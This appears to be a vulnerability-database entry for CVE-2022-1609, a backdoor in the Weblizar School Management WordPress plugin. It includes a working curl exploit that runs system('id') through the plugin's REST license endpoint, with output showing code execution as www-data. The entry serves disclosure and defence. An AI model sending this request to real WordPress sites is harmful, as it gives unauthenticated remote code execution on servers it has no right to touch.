CVE-2022-1609 WordPress Weblizar后门
CVE-2022-1609 CVE-2022-1609 WordPress Weblizar后门 curl -s -d 'blowfish=1' -d "blowf=system('id');" 'localhost:8888/wp-json/am-member/license' uid=33(www-data) gid=33(www-data) groups=33(www-data)
The School Management WordPress plugin prior to 9.9.7 contains an obfuscated backdoor injected in it's license checking code that registers a REST API handler, allowing an unauthenticated malicious user to execute arbitrary PHP code on the site.
Vulnerable Product | Search on Vulmon | Subscribe to Product |
---|---|---|
weblizar school management |